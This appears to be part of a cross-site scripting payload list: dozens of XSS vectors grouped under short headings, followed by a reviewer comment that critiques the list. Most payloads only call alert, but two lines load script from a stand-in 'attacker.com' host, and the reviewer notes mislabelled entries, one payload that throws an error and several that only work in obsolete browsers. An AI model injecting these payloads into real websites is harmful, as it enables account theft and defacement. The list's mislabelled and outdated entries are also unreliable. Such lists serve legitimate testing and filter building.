<script>(alert)(1)</script>
<script>[alert][0](1)</script>
# ES6 features
<script>({alert}={alert:alert},{alert}(1))</script>
<script>[a,b,c,...alert]=1</script>
# Event handlers with spaces
< img src=x onerror=alert(1)>
<img src=x onerror= alert(1)>
<img src=x onerror = alert(1)>
# Without quotes
<img src=x onerror=alert(1)>
<img src=x onerror=alert`1`>
<img src=x onerror=alert(document.domain)>
# Protocol-relative URL
<script src=//attacker.com/xss.js></script>
<img src=//attacker.com/x onerror=alert(1)>
# Meta refresh XSS
<meta http-equiv="refresh" content="0;url=javascript:alert(1)">
<meta http-equiv="refresh" content="0;url=data:text/html,<script>alert(1)</script>">
# Form action XSS
<form action="javascript:alert(1)"><input type=submit></form>
<form><button formaction="javascript:alert(1)">Click</button></form>
# Object data XSS
<object data="javascript:alert(1)">
<object data="data:text/html,<script>alert(1)</script>">
# Embed src XSS
<embed src="javascript:alert(1)">
<embed src="data:text/html,<script>alert(1)</script>">
# Applet XSS
<applet code="java.lang.Runtime">
# Audio/Video XSS
<audio src=x onerror=alert(1)>
<video src=x onerror=alert(1)>
# Picture XSS
<picture><source srcset="javascript:alert(1)"></picture>
# Track XSS
<video><track default src="javascript:alert(1)"></video>
# Shadow DOM XSS
<div><template shadowroot=open><script>alert(1)</script></template></div>
# Custom elements XSS
<custom-element onconnected=alert(1)>
# Web Components XSS
<x-element><script>alert(1)</script></x-element>
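Review bot: `{{constructor.constructor('alert(1)')()}}` and `{{$on.constructor('alert(1)')()}}` appear under both "AngularJS template injection" and "AngularJS 1.6+ sandbox bypass" (the first a third time under "VueJS template injection"), so dedupe them, and rename the 1.6+ heading: AngularJS removed its expression sandbox in 1.6, so for those versions there is no sandbox to bypass and plain expressions evaluate as written. Several labels do not match their payloads: the "React JSX injection" lines are JSX source, which React escapes when it arrives as data (only the `dangerouslySetInnerHTML` line is an injection sink); none of the "Arrow functions" entries contains an arrow function; and `[a,b,c,...alert]=1` under "ES6 features" throws a TypeError because `1` is not iterable. Finally, `expression()`, `<keygen>`, `<applet>` and `<link rel="import">` only apply to obsolete browsers or removed features; mark them legacy so a scanner hit on one of them is not reported as a current finding.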